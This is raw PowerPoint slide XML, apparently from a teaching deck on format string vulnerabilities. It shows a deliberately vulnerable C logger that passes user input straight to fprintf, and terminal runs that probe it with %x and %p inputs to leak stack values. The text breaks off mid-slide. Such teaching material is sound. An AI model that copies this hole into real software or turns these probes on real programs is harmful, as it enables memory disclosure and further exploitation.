              <a:t>Hello%n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>puts the value 5 in the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134224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Simple Vulnerable Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	FILE* f;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log", "a+");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(f);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(f);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1600201"/>
            <a:ext cx="4038600" cy="4177625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(FILE* f) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	char line[65536];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = 0, res;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	while (1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		res = read(0, &amp;line[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>], 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		if (res == 0) exit(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> == 65536) exit(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		if (line[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> - 1] == '\n') {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			line[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>] = '\0';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			break;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(f, line);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202195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0" end="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3" end="3"/>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
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>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
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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Executions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>format_string.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -o format-simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo "test line" | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ test line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo "test line %x %x" | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ test line 1 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "AAAABBBBCCCCDDDD" + "%p" * 8'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
